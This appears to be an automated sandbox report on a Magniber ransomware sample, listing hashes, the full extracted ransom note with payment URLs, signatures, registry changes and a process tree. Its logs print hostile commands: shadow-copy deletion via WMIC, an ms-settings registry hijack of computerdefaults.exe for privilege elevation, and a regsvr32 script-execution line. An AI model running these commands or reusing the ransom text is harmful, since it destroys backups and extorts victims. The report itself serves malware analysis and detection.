magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Analysis

max time kernel
143s
max time network
127s
platform
windows10_x64
resource
win10-en-20211104
submitted
22-11-2021 19:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://b0dca0f0125852c0celtalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://b0dca0f0125852c0celtalkfzj.jobsbig.cam/eltalkfzj http://b0dca0f0125852c0celtalkfzj.boxgas.icu/eltalkfzj http://b0dca0f0125852c0celtalkfzj.sixsees.club/eltalkfzj http://b0dca0f0125852c0celtalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://b0dca0f0125852c0celtalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://b0dca0f0125852c0celtalkfzj.jobsbig.cam/eltalkfzj

http://b0dca0f0125852c0celtalkfzj.boxgas.icu/eltalkfzj

http://b0dca0f0125852c0celtalkfzj.sixsees.club/eltalkfzj

http://b0dca0f0125852c0celtalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2892	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3756	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1096	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4104	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4232	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4276	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4268	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4344	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4404	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4388	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4500	1804	cmd.exe	93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4568	1804	cmd.exe	93

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\ExpandUnpublish.raw => C:\Users\Admin\Pictures\ExpandUnpublish.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\MeasureRedo.raw => C:\Users\Admin\Pictures\MeasureRedo.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\RepairExit.crw => C:\Users\Admin\Pictures\RepairExit.crw.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\CompressJoin.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\CompressJoin.tiff => C:\Users\Admin\Pictures\CompressJoin.tiff.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ResumeConvertFrom.tif => C:\Users\Admin\Pictures\ResumeConvertFrom.tif.eltalkfzj	sihost.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2396 set thread context of 2400	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	30
PID 2396 set thread context of 2448	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	29
PID 2396 set thread context of 2728	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	23
PID 2396 set thread context of 3016	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	12
PID 2396 set thread context of 3472	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	13
PID 2396 set thread context of 3672	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	21

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2644	3672	WerFault.exe	21

Modifies registry class 29 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
504	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3016	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2644	WerFault.exe
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1224	WMIC.exe
Token: SeSecurityPrivilege	1224	WMIC.exe
Token: SeTakeOwnershipPrivilege	1224	WMIC.exe
Token: SeLoadDriverPrivilege	1224	WMIC.exe
Token: SeSystemProfilePrivilege	1224	WMIC.exe
Token: SeSystemtimePrivilege	1224	WMIC.exe
Token: SeProfSingleProcessPrivilege	1224	WMIC.exe
Token: SeIncBasePriorityPrivilege	1224	WMIC.exe
Token: SeCreatePagefilePrivilege	1224	WMIC.exe
Token: SeBackupPrivilege	1224	WMIC.exe
Token: SeRestorePrivilege	1224	WMIC.exe
Token: SeShutdownPrivilege	1224	WMIC.exe
Token: SeDebugPrivilege	1224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1224	WMIC.exe
Token: SeRemoteShutdownPrivilege	1224	WMIC.exe
Token: SeUndockPrivilege	1224	WMIC.exe
Token: SeManageVolumePrivilege	1224	WMIC.exe
Token: 33	1224	WMIC.exe
Token: 34	1224	WMIC.exe
Token: 35	1224	WMIC.exe
Token: 36	1224	WMIC.exe
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	440	WMIC.exe
Token: SeSecurityPrivilege	440	WMIC.exe
Token: SeTakeOwnershipPrivilege	440	WMIC.exe
Token: SeLoadDriverPrivilege	440	WMIC.exe
Token: SeSystemProfilePrivilege	440	WMIC.exe
Token: SeSystemtimePrivilege	440	WMIC.exe
Token: SeProfSingleProcessPrivilege	440	WMIC.exe
Token: SeIncBasePriorityPrivilege	440	WMIC.exe
Token: SeCreatePagefilePrivilege	440	WMIC.exe
Token: SeBackupPrivilege	440	WMIC.exe
Token: SeRestorePrivilege	440	WMIC.exe
Token: SeShutdownPrivilege	440	WMIC.exe
Token: SeDebugPrivilege	440	WMIC.exe
Token: SeSystemEnvironmentPrivilege	440	WMIC.exe
Token: SeRemoteShutdownPrivilege	440	WMIC.exe
Token: SeUndockPrivilege	440	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2400 wrote to memory of 504	2400	sihost.exe	71
PID 2400 wrote to memory of 504	2400	sihost.exe	71
PID 2400 wrote to memory of 3108	2400	sihost.exe	72
PID 2400 wrote to memory of 3108	2400	sihost.exe	72
PID 2400 wrote to memory of 428	2400	sihost.exe	73
PID 2400 wrote to memory of 428	2400	sihost.exe	73
PID 2400 wrote to memory of 872	2400	sihost.exe	74
PID 2400 wrote to memory of 872	2400	sihost.exe	74
PID 872 wrote to memory of 1224	872	cmd.exe	78
PID 872 wrote to memory of 1224	872	cmd.exe	78
PID 2448 wrote to memory of 2880	2448	svchost.exe	79
PID 2448 wrote to memory of 2880	2448	svchost.exe	79
PID 2448 wrote to memory of 1416	2448	svchost.exe	80
PID 2448 wrote to memory of 1416	2448	svchost.exe	80
PID 428 wrote to memory of 440	428	cmd.exe	83
PID 428 wrote to memory of 440	428	cmd.exe	83
PID 2728 wrote to memory of 712	2728	taskhostw.exe	84
PID 2728 wrote to memory of 712	2728	taskhostw.exe	84
PID 2728 wrote to memory of 2280	2728	taskhostw.exe	86
PID 2728 wrote to memory of 2280	2728	taskhostw.exe	86
PID 1416 wrote to memory of 908	1416	cmd.exe	87
PID 1416 wrote to memory of 908	1416	cmd.exe	87
PID 3016 wrote to memory of 1248	3016	Explorer.EXE	89
PID 3016 wrote to memory of 1248	3016	Explorer.EXE	89
PID 3016 wrote to memory of 1496	3016	Explorer.EXE	90
PID 3016 wrote to memory of 1496	3016	Explorer.EXE	90
PID 2880 wrote to memory of 2284	2880	cmd.exe	94
PID 2880 wrote to memory of 2284	2880	cmd.exe	94
PID 3472 wrote to memory of 2508	3472	RuntimeBroker.exe	95
PID 3472 wrote to memory of 2508	3472	RuntimeBroker.exe	95
PID 3472 wrote to memory of 2936	3472	RuntimeBroker.exe	97
PID 3472 wrote to memory of 2936	3472	RuntimeBroker.exe	97
PID 2280 wrote to memory of 1796	2280	cmd.exe	99
PID 2280 wrote to memory of 1796	2280	cmd.exe	99
PID 712 wrote to memory of 1420	712	cmd.exe	100
PID 712 wrote to memory of 1420	712	cmd.exe	100
PID 1496 wrote to memory of 1476	1496	cmd.exe	101
PID 1496 wrote to memory of 1476	1496	cmd.exe	101
PID 2396 wrote to memory of 2292	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	102
PID 2396 wrote to memory of 2292	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	102
PID 2396 wrote to memory of 2336	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 2396 wrote to memory of 2336	2396	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 1248 wrote to memory of 4060	1248	cmd.exe	104
PID 1248 wrote to memory of 4060	1248	cmd.exe	104
PID 2936 wrote to memory of 1076	2936	cmd.exe	107
PID 2936 wrote to memory of 1076	2936	cmd.exe	107
PID 2508 wrote to memory of 3764	2508	cmd.exe	108
PID 2508 wrote to memory of 3764	2508	cmd.exe	108
PID 2336 wrote to memory of 320	2336	cmd.exe	109
PID 2336 wrote to memory of 320	2336	cmd.exe	109
PID 2292 wrote to memory of 2876	2292	cmd.exe	110
PID 2292 wrote to memory of 2876	2292	cmd.exe	110
PID 1096 wrote to memory of 2668	1096	cmd.exe	117
PID 1096 wrote to memory of 2668	1096	cmd.exe	117
PID 2892 wrote to memory of 3076	2892	cmd.exe	118
PID 2892 wrote to memory of 3076	2892	cmd.exe	118
PID 3756 wrote to memory of 980	3756	cmd.exe	119
PID 3756 wrote to memory of 980	3756	cmd.exe	119
PID 4104 wrote to memory of 4168	4104	cmd.exe	122
PID 4104 wrote to memory of 4168	4104	cmd.exe	122
PID 4232 wrote to memory of 4380	4232	cmd.exe	135
PID 4232 wrote to memory of 4380	4232	cmd.exe	135
PID 4268 wrote to memory of 4544	4268	cmd.exe	138
PID 4268 wrote to memory of 4544	4268	cmd.exe	138

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2292
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:2876
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2336
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:320
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1248
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4060
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1496
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1476

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3472
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3764
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1076

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3672
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3672 -s 812
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2644

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2728
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:712
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1420
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2280
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2448
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2284
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1416
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:908

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2400
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:504
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://b0dca0f0125852c0celtalkfzj.jobsbig.cam/eltalkfzj^&1^&48225306^&74^&315^&2215063"
  2⤵
  PID:3108
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:428
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:440
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:872
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1224

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2892
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3076

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3756
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:980

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1096
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2668

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4104
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4168

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4232
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4380

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4276
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4560

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4268
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4544

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4344
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4664

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4404
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4716

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4388
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4704

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4500
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4756

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4568
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4812

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2396-118-0x000001F988A70000-0x000001F988A76000-memory.dmp

Filesize
24KB

Download
memory/2396-161-0x000001F98B160000-0x000001F98B161000-memory.dmp

Filesize
4KB

Download
memory/2396-128-0x000001F98AB60000-0x000001F98AB61000-memory.dmp

Filesize
4KB

Download
memory/2396-124-0x000001F98AB00000-0x000001F98AB01000-memory.dmp

Filesize
4KB

Download
memory/2396-126-0x000001F98AB40000-0x000001F98AB41000-memory.dmp

Filesize
4KB

Download
memory/2396-125-0x000001F98AB10000-0x000001F98AB11000-memory.dmp

Filesize
